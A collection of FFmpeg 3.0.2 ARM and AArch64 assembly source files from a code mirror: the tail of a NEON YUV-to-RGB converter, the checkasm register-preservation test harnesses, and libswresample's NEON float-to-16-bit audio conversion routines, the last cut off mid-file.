process_2l_16px_\precision \ofmt
.endif
.ifc \ifmt,yuv422p
pld [r10, #64*3]
vld1.8 d2, [r6]! @ d2: chroma red line
vld1.8 d3, [r10]! @ d3: chroma blue line
vsubl.u8 q14, d2, d10 @ q14 = U - 128
vsubl.u8 q15, d3, d10 @ q15 = V - 128
process_1l_16px_\precision \ofmt
.endif
subs r8, r8, #16 @ width -= 16
bgt 2b
add r2, r2, r3 @ dst += padding
add r4, r4, r5 @ srcY += paddingY
.ifc \ifmt,nv12
add r11, r11, r3 @ dst2 += padding
add r12, r12, r5 @ srcY2 += paddingY
add r6, r6, r7 @ srcC += paddingC
subs r1, r1, #2 @ height -= 2
.endif
.ifc \ifmt,nv21
add r11, r11, r3 @ dst2 += padding
add r12, r12, r5 @ srcY2 += paddingY
add r6, r6, r7 @ srcC += paddingC
subs r1, r1, #2 @ height -= 2
.endif
.ifc \ifmt,yuv420p
add r11, r11, r3 @ dst2 += padding
add r12, r12, r5 @ srcY2 += paddingY
ldr r7, [sp, #116] @ r7 = linesizeU
sub r7, r7, r0, lsr #1 @ r7 = linesizeU - width / 2 (paddingU)
add r6, r6, r7 @ srcU += paddingU
ldr r7, [sp, #124] @ r7 = linesizeV
sub r7, r7, r0, lsr #1 @ r7 = linesizeV - width / 2 (paddingV)
add r10, r10, r7 @ srcV += paddingV
subs r1, r1, #2 @ height -= 2
.endif
.ifc \ifmt,yuv422p
add r6, r6, r7 @ srcU += paddingU
add r10,r10,r12 @ srcV += paddingV
subs r1, r1, #1 @ height -= 1
.endif
bgt 1b
vpop {q4-q7}
pop {r4-r12, lr}
mov pc, lr
endfunc
.endm
.macro declare_rgb_funcs ifmt precision
declare_func \ifmt, argb, \precision
declare_func \ifmt, rgba, \precision
declare_func \ifmt, abgr, \precision
declare_func \ifmt, bgra, \precision
.endm
declare_rgb_funcs nv12, 16
declare_rgb_funcs nv21, 16
declare_rgb_funcs nv12, 32
declare_rgb_funcs nv21, 32
declare_rgb_funcs yuv420p, 16
declare_rgb_funcs yuv420p, 32
declare_rgb_funcs yuv422p, 16
declare_rgb_funcs yuv422p, 32
|
Akagi201/ffmpeg-xcode
| 4,380
|
ffmpeg-3.0.2/tests/checkasm/aarch64/checkasm.S
|
/****************************************************************************
* Assembly testing and benchmarking tool
* Copyright (c) 2015 Martin Storsjo
* Copyright (c) 2015 Janne Grunau
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02111, USA.
*****************************************************************************/
#include "libavutil/aarch64/asm.S"
const register_init
.quad 0x21f86d66c8ca00ce
.quad 0x75b6ba21077c48ad
.quad 0xed56bb2dcb3c7736
.quad 0x8bda43d3fd1a7e06
.quad 0xb64a9c9e5d318408
.quad 0xdf9a54b303f1d3a3
.quad 0x4a75479abd64e097
.quad 0x249214109d5d1c88
.quad 0x1a1b2550a612b48c
.quad 0x79445c159ce79064
.quad 0x2eed899d5a28ddcd
.quad 0x86b2536fcd8cf636
.quad 0xb0856806085e7943
.quad 0x3f2bf84fc0fcca4e
.quad 0xacbd382dcf5b8de2
.quad 0xd229e1f5b281303f
.quad 0x71aeaff20b095fd9
.quad 0xab63e2e11fa38ed9
endconst
const error_message
.asciz "failed to preserve register"
endconst
// max number of args used by any asm function.
#define MAX_ARGS 15
#define ARG_STACK ((8*(MAX_ARGS - 7) + 15) & ~15)
function checkasm_checked_call, export=1
stp x29, x30, [sp, #-16]!
mov x29, sp
stp x19, x20, [sp, #-16]!
stp x21, x22, [sp, #-16]!
stp x23, x24, [sp, #-16]!
stp x25, x26, [sp, #-16]!
stp x27, x28, [sp, #-16]!
stp d8, d9, [sp, #-16]!
stp d10, d11, [sp, #-16]!
stp d12, d13, [sp, #-16]!
stp d14, d15, [sp, #-16]!
movrel x9, register_init
ldp d8, d9, [x9], #16
ldp d10, d11, [x9], #16
ldp d12, d13, [x9], #16
ldp d14, d15, [x9], #16
ldp x19, x20, [x9], #16
ldp x21, x22, [x9], #16
ldp x23, x24, [x9], #16
ldp x25, x26, [x9], #16
ldp x27, x28, [x9], #16
sub sp, sp, #ARG_STACK
.equ pos, 0
// the first stacked arg is copied to x7
.rept MAX_ARGS-7
ldr x9, [x29, #16 + 8 + pos]
str x9, [sp, #pos]
.equ pos, pos + 8
.endr
mov x12, x0
mov x0, x1
mov x1, x2
mov x2, x3
mov x3, x4
mov x4, x5
mov x5, x6
mov x6, x7
ldr x7, [x29, #16]
blr x12
add sp, sp, #ARG_STACK
stp x0, x1, [sp, #-16]!
movrel x9, register_init
movi v3.8h, #0
.macro check_reg_neon reg1, reg2
ldr q0, [x9], #16
uzp1 v1.2d, v\reg1\().2d, v\reg2\().2d
eor v0.16b, v0.16b, v1.16b
orr v3.16b, v3.16b, v0.16b
.endm
check_reg_neon 8, 9
check_reg_neon 10, 11
check_reg_neon 12, 13
check_reg_neon 14, 15
uqxtn v3.8b, v3.8h
umov x3, v3.d[0]
.macro check_reg reg1, reg2
ldp x0, x1, [x9], #16
eor x0, x0, \reg1
eor x1, x1, \reg2
orr x3, x3, x0
orr x3, x3, x1
.endm
check_reg x19, x20
check_reg x21, x22
check_reg x23, x24
check_reg x25, x26
check_reg x27, x28
cbz x3, 0f
movrel x0, error_message
bl X(checkasm_fail_func)
0:
ldp x0, x1, [sp], #16
ldp d14, d15, [sp], #16
ldp d12, d13, [sp], #16
ldp d10, d11, [sp], #16
ldp d8, d9, [sp], #16
ldp x27, x28, [sp], #16
ldp x25, x26, [sp], #16
ldp x23, x24, [sp], #16
ldp x21, x22, [sp], #16
ldp x19, x20, [sp], #16
ldp x29, x30, [sp], #16
ret
endfunc
|
Akagi201/ffmpeg-xcode
| 3,609
|
ffmpeg-3.0.2/tests/checkasm/arm/checkasm.S
|
/****************************************************************************
* Assembly testing and benchmarking tool
* Copyright (c) 2015 Martin Storsjo
* Copyright (c) 2015 Janne Grunau
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02111, USA.
*****************************************************************************/
#include "libavutil/arm/asm.S"
const register_init
.quad 0x21f86d66c8ca00ce
.quad 0x75b6ba21077c48ad
.quad 0xed56bb2dcb3c7736
.quad 0x8bda43d3fd1a7e06
.quad 0xb64a9c9e5d318408
.quad 0xdf9a54b303f1d3a3
.quad 0x4a75479abd64e097
.quad 0x249214109d5d1c88
endconst
const error_message
.asciz "failed to preserve register"
endconst
@ max number of args used by any asm function.
#define MAX_ARGS 15
#define ARG_STACK 4*(MAX_ARGS - 2)
.macro clobbercheck variant
.equ pushed, 4*9
function checkasm_checked_call_\variant, export=1
push {r4-r11, lr}
.ifc \variant, vfp
vpush {d8-d15}
fmrx r4, FPSCR
push {r4}
.equ pushed, pushed + 16*4 + 4
.endif
movrel r12, register_init
.ifc \variant, vfp
vldm r12, {d8-d15}
.endif
ldm r12, {r4-r11}
sub sp, sp, #ARG_STACK
.equ pos, 0
.rept MAX_ARGS-2
ldr r12, [sp, #ARG_STACK + pushed + 8 + pos]
str r12, [sp, #pos]
.equ pos, pos + 4
.endr
mov r12, r0
mov r0, r2
mov r1, r3
ldrd r2, r3, [sp, #ARG_STACK + pushed]
blx r12
add sp, sp, #ARG_STACK
push {r0, r1}
movrel r12, register_init
mov r3, #0
.ifc \variant, vfp
.macro check_reg_vfp, dreg, inc=8
ldrd r0, r1, [r12], #\inc
vmov r2, lr, \dreg
eor r0, r0, r2
eor r1, r1, lr
orr r3, r3, r0
orr r3, r3, r1
.endm
.irp n, 8, 9, 10, 11, 12, 13, 14
check_reg_vfp d\n
.endr
check_reg_vfp d15, -56
.purgem check_reg_vfp
fmrx r0, FPSCR
ldr r1, [sp, #8]
eor r0, r0, r1
@ Ignore changes in the topmost 5 bits
lsl r0, r0, #5
orr r3, r3, r0
.endif
.macro check_reg reg1, reg2=
ldrd r0, r1, [r12], #8
eor r0, r0, \reg1
orrs r3, r3, r0
.ifnb \reg2
eor r1, r1, \reg2
orrs r3, r3, r1
.endif
.endm
check_reg r4, r5
check_reg r6, r7
@ r9 is a volatile register in the ios ABI
#ifdef __APPLE__
check_reg r8
#else
check_reg r8, r9
#endif
check_reg r10, r11
.purgem check_reg
beq 0f
movrel r0, error_message
blx X(checkasm_fail_func)
0:
pop {r0, r1}
.ifc \variant, vfp
pop {r2}
fmxr FPSCR, r2
vpop {d8-d15}
.endif
pop {r4-r11, pc}
endfunc
.endm
#if HAVE_VFP || HAVE_NEON
clobbercheck vfp
#endif
clobbercheck novfp
|
Akagi201/ffmpeg-xcode
| 14,828
|
ffmpeg-3.0.2/libswresample/aarch64/audio_convert_neon.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
* Copyright (c) 2014 Janne Grunau <janne-libav@jannau.net>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#include "libavutil/aarch64/asm.S"
function swri_oldapi_conv_flt_to_s16_neon, export=1
subs x2, x2, #8
ld1 {v0.4s}, [x1], #16
fcvtzs v4.4s, v0.4s, #31
ld1 {v1.4s}, [x1], #16
fcvtzs v5.4s, v1.4s, #31
b.eq 3f
ands x12, x2, #~15
b.eq 2f
1: subs x12, x12, #16
sqrshrn v4.4h, v4.4s, #16
ld1 {v2.4s}, [x1], #16
fcvtzs v6.4s, v2.4s, #31
sqrshrn2 v4.8h, v5.4s, #16
ld1 {v3.4s}, [x1], #16
fcvtzs v7.4s, v3.4s, #31
sqrshrn v6.4h, v6.4s, #16
st1 {v4.8h}, [x0], #16
sqrshrn2 v6.8h, v7.4s, #16
ld1 {v0.4s}, [x1], #16
fcvtzs v4.4s, v0.4s, #31
ld1 {v1.4s}, [x1], #16
fcvtzs v5.4s, v1.4s, #31
st1 {v6.8h}, [x0], #16
b.ne 1b
ands x2, x2, #15
b.eq 3f
2: ld1 {v2.4s}, [x1], #16
sqrshrn v4.4h, v4.4s, #16
fcvtzs v6.4s, v2.4s, #31
ld1 {v3.4s}, [x1], #16
sqrshrn2 v4.8h, v5.4s, #16
fcvtzs v7.4s, v3.4s, #31
sqrshrn v6.4h, v6.4s, #16
st1 {v4.8h}, [x0], #16
sqrshrn2 v6.8h, v7.4s, #16
st1 {v6.8h}, [x0]
ret
3: sqrshrn v4.4h, v4.4s, #16
sqrshrn2 v4.8h, v5.4s, #16
st1 {v4.8h}, [x0]
ret
endfunc
function swri_oldapi_conv_fltp_to_s16_2ch_neon, export=1
ldp x4, x5, [x1]
subs x2, x2, #8
ld1 {v0.4s}, [x4], #16
fcvtzs v4.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v5.4s, v1.4s, #31
ld1 {v2.4s}, [x5], #16
fcvtzs v6.4s, v2.4s, #31
ld1 {v3.4s}, [x5], #16
fcvtzs v7.4s, v3.4s, #31
b.eq 3f
ands x12, x2, #~15
b.eq 2f
1: subs x12, x12, #16
ld1 {v16.4s}, [x4], #16
fcvtzs v20.4s, v16.4s, #31
sri v6.4s, v4.4s, #16
ld1 {v17.4s}, [x4], #16
fcvtzs v21.4s, v17.4s, #31
ld1 {v18.4s}, [x5], #16
fcvtzs v22.4s, v18.4s, #31
ld1 {v19.4s}, [x5], #16
sri v7.4s, v5.4s, #16
st1 {v6.4s}, [x0], #16
fcvtzs v23.4s, v19.4s, #31
st1 {v7.4s}, [x0], #16
sri v22.4s, v20.4s, #16
ld1 {v0.4s}, [x4], #16
sri v23.4s, v21.4s, #16
st1 {v22.4s}, [x0], #16
fcvtzs v4.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v5.4s, v1.4s, #31
ld1 {v2.4s}, [x5], #16
fcvtzs v6.4s, v2.4s, #31
ld1 {v3.4s}, [x5], #16
fcvtzs v7.4s, v3.4s, #31
st1 {v23.4s}, [x0], #16
b.ne 1b
ands x2, x2, #15
b.eq 3f
2: sri v6.4s, v4.4s, #16
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
ld1 {v2.4s}, [x5], #16
fcvtzs v2.4s, v2.4s, #31
sri v7.4s, v5.4s, #16
ld1 {v3.4s}, [x5], #16
fcvtzs v3.4s, v3.4s, #31
sri v2.4s, v0.4s, #16
st1 {v6.4s,v7.4s}, [x0], #32
sri v3.4s, v1.4s, #16
st1 {v2.4s,v3.4s}, [x0], #32
ret
3: sri v6.4s, v4.4s, #16
sri v7.4s, v5.4s, #16
st1 {v6.4s,v7.4s}, [x0]
ret
endfunc
function swri_oldapi_conv_fltp_to_s16_nch_neon, export=1
cmp w3, #2
b.eq X(swri_oldapi_conv_fltp_to_s16_2ch_neon)
b.gt 1f
ldr x1, [x1]
b X(swri_oldapi_conv_flt_to_s16_neon)
1:
cmp w3, #4
lsl x12, x3, #1
b.lt 4f
5: // 4 channels
ldp x4, x5, [x1], #16
ldp x6, x7, [x1], #16
mov w9, w2
mov x8, x0
ld1 {v4.4s}, [x4], #16
fcvtzs v4.4s, v4.4s, #31
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
ld1 {v6.4s}, [x6], #16
fcvtzs v6.4s, v6.4s, #31
ld1 {v7.4s}, [x7], #16
fcvtzs v7.4s, v7.4s, #31
6:
subs w9, w9, #8
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
sri v5.4s, v4.4s, #16
ld1 {v1.4s}, [x5], #16
fcvtzs v1.4s, v1.4s, #31
sri v7.4s, v6.4s, #16
ld1 {v2.4s}, [x6], #16
fcvtzs v2.4s, v2.4s, #31
zip1 v16.4s, v5.4s, v7.4s
ld1 {v3.4s}, [x7], #16
fcvtzs v3.4s, v3.4s, #31
zip2 v17.4s, v5.4s, v7.4s
st1 {v16.d}[0], [x8], x12
sri v1.4s, v0.4s, #16
st1 {v16.d}[1], [x8], x12
sri v3.4s, v2.4s, #16
st1 {v17.d}[0], [x8], x12
zip1 v18.4s, v1.4s, v3.4s
st1 {v17.d}[1], [x8], x12
zip2 v19.4s, v1.4s, v3.4s
b.eq 7f
ld1 {v4.4s}, [x4], #16
fcvtzs v4.4s, v4.4s, #31
st1 {v18.d}[0], [x8], x12
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
st1 {v18.d}[1], [x8], x12
ld1 {v6.4s}, [x6], #16
fcvtzs v6.4s, v6.4s, #31
st1 {v19.d}[0], [x8], x12
ld1 {v7.4s}, [x7], #16
fcvtzs v7.4s, v7.4s, #31
st1 {v19.d}[1], [x8], x12
b 6b
7:
st1 {v18.d}[0], [x8], x12
st1 {v18.d}[1], [x8], x12
st1 {v19.d}[0], [x8], x12
st1 {v19.d}[1], [x8], x12
subs w3, w3, #4
b.eq end
cmp w3, #4
add x0, x0, #8
b.ge 5b
4: // 2 channels
cmp w3, #2
b.lt 4f
ldp x4, x5, [x1], #16
mov w9, w2
mov x8, x0
tst w9, #8
ld1 {v4.4s}, [x4], #16
fcvtzs v4.4s, v4.4s, #31
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
ld1 {v6.4s}, [x4], #16
fcvtzs v6.4s, v6.4s, #31
ld1 {v7.4s}, [x5], #16
fcvtzs v7.4s, v7.4s, #31
b.eq 6f
subs w9, w9, #8
b.eq 7f
sri v5.4s, v4.4s, #16
ld1 {v4.4s}, [x4], #16
fcvtzs v4.4s, v4.4s, #31
st1 {v5.s}[0], [x8], x12
sri v7.4s, v6.4s, #16
st1 {v5.s}[1], [x8], x12
ld1 {v6.4s}, [x4], #16
fcvtzs v6.4s, v6.4s, #31
st1 {v5.s}[2], [x8], x12
st1 {v5.s}[3], [x8], x12
st1 {v7.s}[0], [x8], x12
st1 {v7.s}[1], [x8], x12
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
st1 {v7.s}[2], [x8], x12
st1 {v7.s}[3], [x8], x12
ld1 {v7.4s}, [x5], #16
fcvtzs v7.4s, v7.4s, #31
6:
subs w9, w9, #16
ld1 {v0.4s}, [x4], #16
sri v5.4s, v4.4s, #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x5], #16
sri v7.4s, v6.4s, #16
st1 {v5.s}[0], [x8], x12
st1 {v5.s}[1], [x8], x12
fcvtzs v1.4s, v1.4s, #31
st1 {v5.s}[2], [x8], x12
st1 {v5.s}[3], [x8], x12
ld1 {v2.4s}, [x4], #16
st1 {v7.s}[0], [x8], x12
fcvtzs v2.4s, v2.4s, #31
st1 {v7.s}[1], [x8], x12
ld1 {v3.4s}, [x5], #16
st1 {v7.s}[2], [x8], x12
fcvtzs v3.4s, v3.4s, #31
st1 {v7.s}[3], [x8], x12
sri v1.4s, v0.4s, #16
sri v3.4s, v2.4s, #16
b.eq 6f
ld1 {v4.4s}, [x4], #16
st1 {v1.s}[0], [x8], x12
fcvtzs v4.4s, v4.4s, #31
st1 {v1.s}[1], [x8], x12
ld1 {v5.4s}, [x5], #16
st1 {v1.s}[2], [x8], x12
fcvtzs v5.4s, v5.4s, #31
st1 {v1.s}[3], [x8], x12
ld1 {v6.4s}, [x4], #16
st1 {v3.s}[0], [x8], x12
fcvtzs v6.4s, v6.4s, #31
st1 {v3.s}[1], [x8], x12
ld1 {v7.4s}, [x5], #16
st1 {v3.s}[2], [x8], x12
fcvtzs v7.4s, v7.4s, #31
st1 {v3.s}[3], [x8], x12
b.gt 6b
6:
st1 {v1.s}[0], [x8], x12
st1 {v1.s}[1], [x8], x12
st1 {v1.s}[2], [x8], x12
st1 {v1.s}[3], [x8], x12
st1 {v3.s}[0], [x8], x12
st1 {v3.s}[1], [x8], x12
st1 {v3.s}[2], [x8], x12
st1 {v3.s}[3], [x8], x12
b 8f
7:
sri v5.4s, v4.4s, #16
sri v7.4s, v6.4s, #16
st1 {v5.s}[0], [x8], x12
st1 {v5.s}[1], [x8], x12
st1 {v5.s}[2], [x8], x12
st1 {v5.s}[3], [x8], x12
st1 {v7.s}[0], [x8], x12
st1 {v7.s}[1], [x8], x12
st1 {v7.s}[2], [x8], x12
st1 {v7.s}[3], [x8], x12
8:
subs w3, w3, #2
add x0, x0, #4
b.eq end
4: // 1 channel
ldr x4, [x1]
tst w2, #8
mov w9, w2
mov x5, x0
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
b.ne 8f
6:
subs w9, w9, #16
ld1 {v2.4s}, [x4], #16
fcvtzs v2.4s, v2.4s, #31
ld1 {v3.4s}, [x4], #16
fcvtzs v3.4s, v3.4s, #31
st1 {v0.h}[1], [x5], x12
st1 {v0.h}[3], [x5], x12
st1 {v0.h}[5], [x5], x12
st1 {v0.h}[7], [x5], x12
st1 {v1.h}[1], [x5], x12
st1 {v1.h}[3], [x5], x12
st1 {v1.h}[5], [x5], x12
st1 {v1.h}[7], [x5], x12
b.eq 7f
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
7:
st1 {v2.h}[1], [x5], x12
st1 {v2.h}[3], [x5], x12
st1 {v2.h}[5], [x5], x12
st1 {v2.h}[7], [x5], x12
st1 {v3.h}[1], [x5], x12
st1 {v3.h}[3], [x5], x12
st1 {v3.h}[5], [x5], x12
st1 {v3.h}[7], [x5], x12
b.gt 6b
ret
8:
subs w9, w9, #8
st1 {v0.h}[1], [x5], x12
st1 {v0.h}[3], [x5], x12
st1 {v0.h}[5], [x5], x12
st1 {v0.h}[7], [x5], x12
st1 {v1.h}[1], [x5], x12
st1 {v1.h}[3], [x5], x12
st1 {v1.h}[5], [x5], x12
st1 {v1.h}[7], [x5], x12
b.eq end
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
b 6b
end:
ret
endfunc
|
Akagi201/ffmpeg-xcode
| 14,166
|
ffmpeg-3.0.2/libswresample/arm/audio_convert_neon.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of libswresample.
*
* libswresample is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* libswresample is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with libswresample; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#include "libavutil/arm/asm.S"
function swri_oldapi_conv_flt_to_s16_neon, export=1
subs r2, r2, #8
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q8, q0, #31
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q9, q1, #31
beq 3f
bics r12, r2, #15
beq 2f
1: subs r12, r12, #16
vqrshrn.s32 d4, q8, #16
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q0, q0, #31
vqrshrn.s32 d5, q9, #16
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q1, q1, #31
vqrshrn.s32 d6, q0, #16
vst1.16 {q2}, [r0,:128]!
vqrshrn.s32 d7, q1, #16
vld1.32 {q8}, [r1,:128]!
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r1,:128]!
vcvt.s32.f32 q9, q9, #31
vst1.16 {q3}, [r0,:128]!
bne 1b
ands r2, r2, #15
beq 3f
2: vld1.32 {q0}, [r1,:128]!
vqrshrn.s32 d4, q8, #16
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r1,:128]!
vqrshrn.s32 d5, q9, #16
vcvt.s32.f32 q1, q1, #31
vqrshrn.s32 d6, q0, #16
vst1.16 {q2}, [r0,:128]!
vqrshrn.s32 d7, q1, #16
vst1.16 {q3}, [r0,:128]!
bx lr
3: vqrshrn.s32 d4, q8, #16
vqrshrn.s32 d5, q9, #16
vst1.16 {q2}, [r0,:128]!
bx lr
endfunc
function swri_oldapi_conv_fltp_to_s16_2ch_neon, export=1
ldm r1, {r1, r3}
subs r2, r2, #8
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q8, q0, #31
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q9, q1, #31
vld1.32 {q10}, [r3,:128]!
vcvt.s32.f32 q10, q10, #31
vld1.32 {q11}, [r3,:128]!
vcvt.s32.f32 q11, q11, #31
beq 3f
bics r12, r2, #15
beq 2f
1: subs r12, r12, #16
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q0, q0, #31
vsri.32 q10, q8, #16
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q1, q1, #31
vld1.32 {q12}, [r3,:128]!
vcvt.s32.f32 q12, q12, #31
vld1.32 {q13}, [r3,:128]!
vsri.32 q11, q9, #16
vst1.16 {q10}, [r0,:128]!
vcvt.s32.f32 q13, q13, #31
vst1.16 {q11}, [r0,:128]!
vsri.32 q12, q0, #16
vld1.32 {q8}, [r1,:128]!
vsri.32 q13, q1, #16
vst1.16 {q12}, [r0,:128]!
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r1,:128]!
vcvt.s32.f32 q9, q9, #31
vld1.32 {q10}, [r3,:128]!
vcvt.s32.f32 q10, q10, #31
vld1.32 {q11}, [r3,:128]!
vcvt.s32.f32 q11, q11, #31
vst1.16 {q13}, [r0,:128]!
bne 1b
ands r2, r2, #15
beq 3f
2: vsri.32 q10, q8, #16
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q1, q1, #31
vld1.32 {q12}, [r3,:128]!
vcvt.s32.f32 q12, q12, #31
vsri.32 q11, q9, #16
vld1.32 {q13}, [r3,:128]!
vcvt.s32.f32 q13, q13, #31
vst1.16 {q10}, [r0,:128]!
vsri.32 q12, q0, #16
vst1.16 {q11}, [r0,:128]!
vsri.32 q13, q1, #16
vst1.16 {q12-q13},[r0,:128]!
bx lr
3: vsri.32 q10, q8, #16
vsri.32 q11, q9, #16
vst1.16 {q10-q11},[r0,:128]!
bx lr
endfunc
function swri_oldapi_conv_fltp_to_s16_nch_neon, export=1
cmp r3, #2
itt lt
ldrlt r1, [r1]
blt X(swri_oldapi_conv_flt_to_s16_neon)
beq X(swri_oldapi_conv_fltp_to_s16_2ch_neon)
push {r4-r8, lr}
cmp r3, #4
lsl r12, r3, #1
blt 4f
@ 4 channels
5: ldm r1!, {r4-r7}
mov lr, r2
mov r8, r0
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vld1.32 {q10}, [r6,:128]!
vcvt.s32.f32 q10, q10, #31
vld1.32 {q11}, [r7,:128]!
vcvt.s32.f32 q11, q11, #31
6: subs lr, lr, #8
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vsri.32 q9, q8, #16
vld1.32 {q1}, [r5,:128]!
vcvt.s32.f32 q1, q1, #31
vsri.32 q11, q10, #16
vld1.32 {q2}, [r6,:128]!
vcvt.s32.f32 q2, q2, #31
vzip.32 d18, d22
vld1.32 {q3}, [r7,:128]!
vcvt.s32.f32 q3, q3, #31
vzip.32 d19, d23
vst1.16 {d18}, [r8], r12
vsri.32 q1, q0, #16
vst1.16 {d22}, [r8], r12
vsri.32 q3, q2, #16
vst1.16 {d19}, [r8], r12
vzip.32 d2, d6
vst1.16 {d23}, [r8], r12
vzip.32 d3, d7
beq 7f
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vst1.16 {d2}, [r8], r12
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vst1.16 {d6}, [r8], r12
vld1.32 {q10}, [r6,:128]!
vcvt.s32.f32 q10, q10, #31
vst1.16 {d3}, [r8], r12
vld1.32 {q11}, [r7,:128]!
vcvt.s32.f32 q11, q11, #31
vst1.16 {d7}, [r8], r12
b 6b
7: vst1.16 {d2}, [r8], r12
vst1.16 {d6}, [r8], r12
vst1.16 {d3}, [r8], r12
vst1.16 {d7}, [r8], r12
subs r3, r3, #4
it eq
popeq {r4-r8, pc}
cmp r3, #4
add r0, r0, #8
bge 5b
@ 2 channels
4: cmp r3, #2
blt 4f
ldm r1!, {r4-r5}
mov lr, r2
mov r8, r0
tst lr, #8
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vld1.32 {q10}, [r4,:128]!
vcvt.s32.f32 q10, q10, #31
vld1.32 {q11}, [r5,:128]!
vcvt.s32.f32 q11, q11, #31
beq 6f
subs lr, lr, #8
beq 7f
vsri.32 d18, d16, #16
vsri.32 d19, d17, #16
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vst1.32 {d18[0]}, [r8], r12
vsri.32 d22, d20, #16
vst1.32 {d18[1]}, [r8], r12
vsri.32 d23, d21, #16
vst1.32 {d19[0]}, [r8], r12
vst1.32 {d19[1]}, [r8], r12
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vst1.32 {d22[0]}, [r8], r12
vst1.32 {d22[1]}, [r8], r12
vld1.32 {q10}, [r4,:128]!
vcvt.s32.f32 q10, q10, #31
vst1.32 {d23[0]}, [r8], r12
vst1.32 {d23[1]}, [r8], r12
vld1.32 {q11}, [r5,:128]!
vcvt.s32.f32 q11, q11, #31
6: subs lr, lr, #16
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vsri.32 d18, d16, #16
vld1.32 {q1}, [r5,:128]!
vcvt.s32.f32 q1, q1, #31
vsri.32 d19, d17, #16
vld1.32 {q2}, [r4,:128]!
vcvt.s32.f32 q2, q2, #31
vld1.32 {q3}, [r5,:128]!
vcvt.s32.f32 q3, q3, #31
vst1.32 {d18[0]}, [r8], r12
vsri.32 d22, d20, #16
vst1.32 {d18[1]}, [r8], r12
vsri.32 d23, d21, #16
